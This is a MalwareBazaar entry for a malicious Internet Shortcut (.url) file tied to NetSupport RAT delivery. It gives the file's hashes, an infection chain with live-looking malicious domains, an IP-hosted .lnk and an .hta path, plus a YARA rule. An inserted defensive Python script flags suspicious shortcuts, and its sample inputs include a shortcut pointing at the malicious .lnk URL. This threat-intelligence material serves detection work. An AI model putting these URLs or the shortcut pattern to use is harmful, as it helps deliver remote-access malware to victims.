MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6b11ce7c0306afb09c81991aa88969f585e0a53bb6249346395c55970b85ae31. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: NetSupport
Vendor detections: 3

SHA256 hash: 6b11ce7c0306afb09c81991aa88969f585e0a53bb6249346395c55970b85ae31
SHA3-384 hash: f8f82375a2032880c0581967818a91e3761471357c1b0ac675329586cc482821ade505d4ef15e2521577302b05798b80
SHA1 hash: 2e1945b198efa5a48fbe451e33a350e726e01cf5
MD5 hash: 3910fd66e7a8df6b635662838092c2bd
humanhash: spring-cat-romeo-queen
File name: Install%20Updater%20(V105.215.8412_silent).url
Signature: NetSupport
File size: 152 bytes
First seen: 2023-07-24 17:40:18 UTC
Last seen: Never
File type:
MIME type: text/plain
ssdeep: 3:HRAbABGQYmqSsbIHtzKEgDgFFHvUo1YSo/QJ5FLvyYesbBSn:HRYFVmqSsbw1fSgnPISoIJ5FLvyYesbw
TLSH: T116C08C60863EC0BC89A3162CC80A8C6DEA825042227AD9B143E12A8AF8530A54F8CDA5
TrID: 91.6% (.URL) Windows URL shortcut (11000/1/2); 8.3% (.INI) Generic INI configuration (1000/1)
Reporter: rmceoin
Tags: FakeSG, NetSupport, url


rmceoin
Infection chain
compromised site
-->
google-analytiks.com/sBY76j
-->
esteticalocarno.com/wp-content/uploads/2023/02/Install%20Updater%20(V105.215.8412_silent).url
-->
http://185.252.179.64:80/Downloads/shdeulerinstall.lnk
-->
www.esteticalocarno.com/wp-content/uploads/2018/04/HHYGASDBBBX.hta
-->
NetSupport GatewayAddress conluase62.com:5051

Intelligence


File Origin
# of uploads: 1
# of downloads: 113
Origin country: US

Vendor Threat Intelligence
Verdict: MALICIOUS
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: Methodology_Contains_Shortcut_OtherURIhandlers
Author: @itsreallynick (Nick Carr)
Description: Detects possible shortcut usage for .URL persistence
Reference: https://twitter.com/cglyer/status/1176184798248919044
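The rule above targets .URL files that use a URI handler other than http/https. An added example, not part of this MalwareBazaar entry or of the YARA rule: a Python triage script that parses the INI-style Internet Shortcut format and reports the traits that matter for this kind of sample, namely a non-http handler, a file:// target on a remote host, a target that is itself a shortcut or script (the chain in the reporter's comment fetches a .lnk), and an IconFile served from a remote location. All sample inputs are constructed; the page does not show the real 152-byte file's contents, and the chain-style sample only assumes that its URL= line pointed at the .lnk listed in the comment.

```python
"""Triage an Internet Shortcut (.url) file for shortcut-abuse traits."""
from urllib.parse import urlparse

# Schemes an ordinary browser-bound shortcut uses; anything else deserves a look.
BROWSER_SCHEMES = {"http", "https"}
# Extensions Explorer executes or hands to a script host rather than displaying.
RISKY_EXTS = (".lnk", ".hta", ".exe", ".js", ".jse", ".vbs", ".vbe", ".wsf",
              ".scr", ".bat", ".cmd", ".msi", ".dll", ".ps1")


def parse_url_file(text: str) -> dict:
    """Minimal INI parser for .url files: returns {section: {key: value}}.

    Section names and keys are lower-cased so URL=, Url= and url= match alike.
    """
    sections: dict = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def assess_url_file(text: str) -> list:
    """Return a list of findings; an empty list means nothing stood out."""
    findings = []
    body = parse_url_file(text).get("internetshortcut")
    if body is None:
        return ["missing [InternetShortcut] section"]
    target = body.get("url", "")
    if not target:
        return ["no URL= entry"]
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    if scheme not in BROWSER_SCHEMES:
        findings.append(f"non-http URI handler: {scheme or '(none)'}")
    if scheme == "file" and parsed.netloc:
        # file://host/share/... makes Explorer reach out over SMB or WebDAV.
        findings.append(f"file:// with remote host {parsed.netloc} (SMB/WebDAV fetch)")
    path = parsed.path.lower()
    for ext in RISKY_EXTS:
        if path.endswith(ext):
            findings.append(f"target is an executable/shortcut type: {ext}")
            break
    icon = body.get("iconfile", "")
    if icon.startswith("\\\\") or icon.lower().startswith(("http://", "https://")):
        # A remote IconFile is fetched as soon as the shortcut is rendered.
        findings.append(f"IconFile fetched from remote location: {icon}")
    return findings


# Constructed samples (assumptions, not the contents of the real file).
BENIGN = "[InternetShortcut]\r\nURL=https://example.com/\r\nIconIndex=0\r\n"
# Assumes the sample's URL= pointed at the .lnk named in the infection chain.
CHAIN_STYLE = ("[InternetShortcut]\r\n"
               "URL=http://185.252.179.64:80/Downloads/shdeulerinstall.lnk\r\n")
# The case the YARA rule is after: a non-http handler with a remote share.
FILE_HANDLER = ("[InternetShortcut]\r\n"
                "URL=file://203.0.113.10/share/update.lnk\r\n"
                "IconFile=\\\\203.0.113.10\\share\\icon.ico\r\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("chain-style", CHAIN_STYLE),
                         ("file-handler", FILE_HANDLER)):
        print(f"{name}: {assess_url_file(sample) or ['clean']}")
```

Run it against a directory of .url attachments or downloads and anything with findings goes to the sandbox queue; the benign sample should come back clean, the chain-style one is flagged only for its .lnk target, and the file:// sample trips every check.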

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Distributed via drive-by
